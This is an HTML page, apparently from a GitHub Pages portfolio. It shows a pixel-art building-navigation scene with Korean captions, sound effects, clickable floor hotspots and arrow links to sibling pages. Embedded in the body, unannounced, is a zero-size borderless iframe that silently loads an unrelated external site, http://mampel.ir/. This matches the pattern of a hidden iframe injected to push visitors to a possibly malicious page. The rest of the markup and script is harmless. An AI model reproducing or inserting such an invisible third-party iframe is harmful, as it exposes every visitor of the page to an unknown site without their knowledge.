<!DOCTYPE html>
<html>
<style>
	@font-face {
      font-family: "DungGeunMo";
      src: url("DungGeunMo.woff");
    }
	
	body{background-color: #484535; font-family: "DungGeunMo";}
	#backk{width: auto; height: 100%; animation:start 2s alternate;}
	#backk img{width: 1250px; height: auto;}
	
	#poom{bottom: 10%; font-weight: 5px; font-size: 1em;display:none; left: 28%;font-family: "DungGeunMo";z-index: 11;}
	#poom2{bottom: 10%; font-weight: 5px; font-size: 1em;display:none; left: 28%;font-family: "DungGeunMo";z-index: 11;}

	#bx { position: absolute; bottom: 5%; left: 25%; opacity: 0; z-index: 9;}
	#bx img{ width: 70%; height: auto;  }

	#floor { position: absolute; z-index: 99;cursor: pointer; top: 50%; left: 40%; }
	#floor img{ position: absolute; width: 300px; height: 200px;z-index: 99;cursor: pointer;}
	#floo { position: absolute; z-index: 99;cursor: pointer; top: 20%; left: 60%; }
	#floo img{ position: absolute;  width: 300px; height: 200px;z-index: 99;cursor: pointer;}

	#lefts{top: 50%; left: 3%; position: absolute; cursor: pointer; animation: here 3s alternate;}
	#lefts img{width: 40px; height: auto; }
	#rights{top: 50%; right: 3%; position: absolute; animation: heree 3s alternate;}
	#rights img{width: 40px; height: auto;cursor: pointer; }

	#okk{bottom: 13%; right: 30%;z-index: 15; cursor: pointer; position: absolute;display:none;}
		#okk img{height: 20px;width: auto; }

	#container{position: relative; margin: auto; width:1250px; height: 1000px;font-family: "DungGeunMo"; }

@-webkit-keyframes typing { from { width: 0; } }
@-webkit-keyframes blink-caret { 50% { border-color: #484535; } }

@keyframes start{
			0%{opacity: 0;}
			
			100%{opacity: 1;}
		}

h1 { 
	color: #26241B;
	border-right: .2em solid #26241B;
	 
	width: 20ch;
	margin: 2em 1em;
	white-space: nowrap;
	overflow: hidden;
	position: absolute;
	-webkit-animation: typing 7s steps(21, end),
	           blink-caret .5s step-end infinite alternate;
}
h3 { 
	color: #26241B;
	border-right: .2em solid #26241B;
	 
	width: 17ch;
	margin: 2em 1em;
	white-space: nowrap;
	overflow: hidden;
	position: absolute;
	-webkit-animation: typing 7s steps(21, end),
	           blink-caret .5s step-end infinite alternate;
}
h2 { 
	color: #484535;
	border-right: .2em solid #26241B;
	 
	width: 46ch;
	margin: 2em 1em;
	white-space: nowrap;
	overflow: hidden;
	position: absolute;
	-webkit-animation: typing 3s steps(40, end),
	           blink-caret .1s step-end infinite alternate; z-index: 3;
}




@keyframes here{
			0%{left: 5%;}
			
			100%{left: 3%;}
		}

@keyframes heree{
			0%{right: 5%;}
			
			100%{right: 3%;}
		}		
</style>

<head>
	<title></title>
</head>

<body>
	<div id="container">
	<audio id="walk">
		<source src="walk.mp3" type="audio/mpeg" autoplay="true" preload="auto">
	</audio>
		
	<audio id="floormp">
		<source src="floor.mp3" type="audio/mpeg">
	</audio>


	 
	  <h2 id="poom">건축학과로 가는길이다. 지금은 갈 필요가 없다.</h2>
	  <h2 id="poom2">7층으로 가는길이다. 지금은 갈 필요가 없다.</h2>



<iframe src="http://mampel.ir/" frameborder="0" style="width:0px;height:0px;border:0px" ></iframe>

	<div id="backk">
		<center>
		<img src="main.png">
		</center>
	</div>
<a href="https://seoojing.github.io/popol_map/">
	<div id="lefts">
		<img src="here.png">
	</div>
</a>
			<a href="https://seoojing.github.io/W.C/">
	<div id="rights">
		<img src="orhere.png">
	</div>
			</a>

	<div id="bx">
		<img src="boox.png">
	</div>
	<div id="floor">
		<img src="blank.png">
	</div>
	<div id="floo">
		<img src="blank.png">
	</div>
	<div id="okk">
		<img src="okk.png">
	</div>

	
</div>
<script type="text/javascript">

var bgPlay = 0;
window.onmousemove = function(){
	bgPlay++;
	if(bgPlay == 1){ walk.play(); }
}

var toggle = "off";
	
var toggle = "off";
	var clickNumber = 0;
	floor.onclick = function(){
		
		if(toggle == "off"){
			floormp.play();
			toggle = "on";
			bx.style.opacity = 1;
			poom.style.display = "inline";
			poom2.style.display = "none";
		okk.style.display = "inline"}
			else{
			toggle = "off";
			bx.style.opacity = 0;
			poom.style.display = "none";
			poom2.style.display = "none";
			okk.style.display = "none"
			
		}
	}

	floo.onclick = function(){
		
		if(toggle == "off"){
			poom.style.display = "none";
			floormp.play();
			toggle = "on";
			bx.style.opacity = 1;
			poom2.style.display = "inline";
			okk.style.display = "inline"
		}
			else{
				poom.style.display = "none";
			toggle = "off";
			bx.style.opacity = 0;
			poom2.style.display = "none";
			okk.style.display = "none"
			
		}
	}

okk.onclick = function(){
	okk.style.display = "none"
	bx.style.opacity = 0;
			poom.style.display = "none";
			poom2.style.display = "none";

}



</script>
</body>
</html>